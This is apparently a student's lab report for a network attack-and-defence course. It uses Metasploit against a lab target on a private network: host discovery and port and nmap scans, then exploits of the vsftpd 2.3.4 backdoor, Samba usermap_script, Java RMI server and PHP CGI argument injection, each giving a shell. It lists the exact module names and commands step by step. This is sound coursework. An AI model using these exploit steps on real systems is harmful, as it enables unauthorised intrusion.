20222413 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

1.1本周学习内容
在本周的学习过程中,我学习了如何使用Metasploit工具针对不同漏洞进行攻击,包括IE浏览器的ms10-002极光漏洞、Windows的SMB服务的MS08_067漏洞等。
1.2实验内容
掌握metasploit的用法:
(1)前期渗透
①主机发现
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。
(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

2.实验过程

攻击机kali的ip地址:192.168.117.129

靶机ip地址:192.168.117.148

2.1前期渗透
2.1.1主机发现
①输入search arp_sweep寻找Aux中的arp_sweep模块
②输入use 0使用该模块
③输入show options检查设置
④输入set RHOST 192.168.117.0/24设置主机发现的网段
⑤输入run运行,得到主机发现的结果,发现靶机ip地址192.168.117.148

2.1.2端口扫描
①输入search portscan寻找Aux中的portscan/tcp模块
②输入use 5使用该模块
③输入show options检查设置
④输入set RHOST 192.168.117.148设置目标ip地址
⑤输入run运行

⑥所得端口扫描结果如下

2.1.3选做
①系统扫描,在终端界面输入nmap -O 192.168.117.148扫描靶机系统

②漏洞扫描,在终端界面输入nmap --script=vlun 192.168.117.148扫描靶机漏洞

2.2Vsftpd源码包后门漏洞
①输入use exploit/unix/ftp/vsftpd_234_backdoor使用笑脸漏洞的模块
②输入show options检查设置
③输入set RHOST 192.168.117.148设置目标ip地址
④输入run运行
⑤成功入侵目标主机,输入pwd``id``uname -a命令验证成功获取主机shell

2.3SambaMS-RPC Shell命令注入漏洞
①输入use exploit/multi/samba/usermap_script选择漏洞
set RHOST 192.168.117.148设置要攻击的机器IP
exploit开始攻击
④利用成功 执行uname–a验证,成功获取靶机shell

2.4Java RMI SERVER命令执行漏洞
①检查1099端口是否打开,在之前的端口扫描中可以找到1099端口处于开放状态

use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set RHOST 192.168.117.148
exploit/run
sessions -i id,此处id为1,会话正在进行
shell 进入meterpreter时,使用whoami验证,结果返回root,成功获取主机shell


2.5PHP CGI参数执行注入漏洞
use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST 192.168.117.148 设置要攻击的机器IP
exploit/run 开始攻击
④输入shell、uname -a、pwd进行验证,成功获取主机shell

3.问题及解决方案

4.学习感悟、思考等

基于在课堂测试中所学的经验知识,我能够轻松地完成本次实验任务,在完成过程中没有遇到问题。通过这次实验我了解了更多系统漏洞的攻击方法,对于Metasploit的使用更加熟练,提高了我在实际渗透中的应用能力。

参考资料

  • 渗透测试-nmap常用的漏扫命令https://blog.csdn.net/lza20001103/article/details/140351330
posted @ 2024-11-21 23:14  20222413韩亥珅  阅读(1)  评论(0编辑  收藏  举报